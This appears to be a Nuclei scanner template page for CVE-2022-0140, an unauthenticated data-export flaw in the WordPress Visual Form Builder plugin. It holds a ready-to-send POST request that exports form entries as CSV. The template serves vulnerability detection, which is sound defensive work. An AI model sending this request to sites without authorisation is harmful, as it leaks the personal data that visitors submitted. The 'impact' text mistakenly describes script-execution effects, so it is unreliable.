Skip to content
Nuclei Templates

WordPress Visual Form Builder <3.0.8 - Information Disclosure

ID: CVE-2022-0140

Severity: medium

Author: random-robbie

Tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro

Description

Section titled “Description”

WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0140


info:
  name: WordPress Visual Form Builder <3.0.8 - Information Disclosure
  author: random-robbie
  severity: medium
  description: |
    WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
    - https://www.fortiguard.com/zeroday/FG-VD-21-082
    - https://nvd.nist.gov/vuln/detail/cve-2022-0140
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0140
    cwe-id: CWE-306
    epss-score: 0.00966
    epss-percentile: 0.8297
    cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: vfbpro
    product: visual_form_builder
    framework: wordpress
  tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro


http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/admin.php?page=vfb-export
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}


        vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Date Submitted"'
          - '"Entries ID"'
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100976af6a5af18edd233b8f1a50a7a2ea3bbe6e5e400fb510098ec1afe491754bd022100e3fadca523f1c01b95b85a013383b17db7b8d274d2f2b81f68e3f377c75707be:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0140.yaml"

View on Github